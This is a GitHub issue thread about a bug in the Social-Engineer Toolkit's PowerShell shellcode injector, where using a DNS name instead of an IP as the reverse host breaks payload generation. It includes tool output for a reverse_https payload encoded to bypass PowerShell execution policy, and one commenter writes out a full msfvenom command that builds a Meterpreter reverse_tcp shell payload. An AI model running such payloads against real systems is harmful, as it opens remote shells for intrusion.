/social-engineer-toolkit

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Powershell Alphanumeric Shellcode Injector DNS-Error #344

Closed
AngryBananer opened this Issue Dec 15, 2016 · 3 comments

Comments

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
3 participants
@AngryBananer @binarymist @trustedsec
@AngryBananer

AngryBananer commented Dec 15, 2016
edited

Hello,
i love your tool, but sometimes when i enter a DNS as reverse host,
i get the following error. When i try to execute it on a Windows machine, the message "Poweshell stopped working" pop's up.

Enter the IPAddress or DNS name for the reverse host: hostname.ddns.net
set:powershell> Enter the port for the reverse [443]:442
[] Prepping the payload for delivery and injecting alphanumeric shellcode...
[] Generating x86-based powershell injection code...
[] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 353 bytes
Final size of c file: 1508 bytes
[!] Something went wrong, printing error: invalid literal for int() with base 10: 'hostname'
[] Finished generating powershell injection bypass.
[] Encoded to bypass execution restriction policy...
[] If you want the powershell commands and attack, they are exported to
/root/.set/reports/powershell/

With a normal IP everything works fine.
I'm looking forward to a fix and sorry for my bad english!
@binarymist

This comment has been minimized.

Sign in to view

binarymist commented Dec 22, 2016
edited

+1
Seems to be related to #276?
@trustedsec

This comment has been minimized.

Sign in to view
Owner

trustedsec commented Dec 27, 2016

Fixed on the latest version - this was due to updating the codebase to use reverse_https by default which does not do byte string conversion of ipaddresses. Thanks for the report! Should be updating it here when I work through the other bugs in the next few minutes.

@trustedsec trustedsec closed this Dec 27, 2016

@binarymist

This comment has been minimized.

Sign in to view

binarymist commented Dec 27, 2016

Doesn't work using DNS either. I'm using 7.4.3 from Kali. https://github.com/nixawk/psmsf/ was the only payload containing windows/meterpreter/reverse_tcp shellcode that seemed to work, I'm pulling all the related payloads apart to work out why.

So are you going to be providing the option to choose reverse_tcp as well? That payload should be similar to that generated by:

msfvenom --payload windows/meterpreter/reverse_tcp LHOST=<listener-ip> LPORT=4444 StagerURILength=5 StagerVerifySSLCert=false --encoder x86/shikata_ga_nai --arch x86 --platform windows --smallest --format c

Which works within this (https://github.com/nixawk/psmsf/blob/master/psmsf#L113) payload.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment